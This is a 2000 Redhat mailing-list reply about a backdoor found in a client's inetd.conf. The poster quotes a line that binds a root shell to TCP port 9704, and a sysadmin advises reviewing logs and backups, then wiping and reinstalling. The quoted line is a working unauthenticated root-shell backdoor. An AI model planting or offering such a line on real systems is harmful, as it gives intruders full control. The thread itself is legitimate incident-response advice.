On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
>
> Looking over a clients system I found the following
> line in inetd.con:
> 9704 stream tcp nowait root /bin/sh sh -i
EEK!
> telnet to the port and instant root access.
Yup.
> A quick look around didn't reveal any obvious
> problems. I'm worred about the non-obvious
> now.
Good man.
> any suggestions for things to do and places
> to poke into would be appreciated.
Well...
> (is it likely the system was compromsied for
> future use?)
I'd say so, yes. And in that case all bets are off; they could have left
behind just about anything as a back door or other malicious stuff, the only
way you can really be sure they're gone (whoever "they" are) is to reinstall
from bare metal. :(
Don't really know what your setup is like or how long they've owned your box,
but hopefully you've kept good logs and backups of your system so that you can
have some idea of when the inetd.conf file was compromised (do old backup
versions of the file have that line as well? how far back?) and can then
cross-reference to that date in your old log files. But even then all you'd
get would be some indication of when and how they got in, and maybe some clues
about what they did once they got there. It's almost impossible to guarantee
that you've undone the damage unless you were running tripwire or some other
equivalent.
This is a pretty klutzy way of owning a system, whoever did this was either
(a) not real slick or (b) not at all concerned about being the only person
who could own your box. But that doesn't mean that they didn't hide their
tracks well elsewhere. Best bet is to take the machine down (at least off
the network), secure any vital data, wipe it, and start over. Sorry.
Cheers,
-m
--
Michael Jinks, IB
Systems Administrator, CCCP
finger [EMAIL PROTECTED] for public key
Vote Duke! http://www.entertaindom.com/pages/duke2000/home.jsp
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
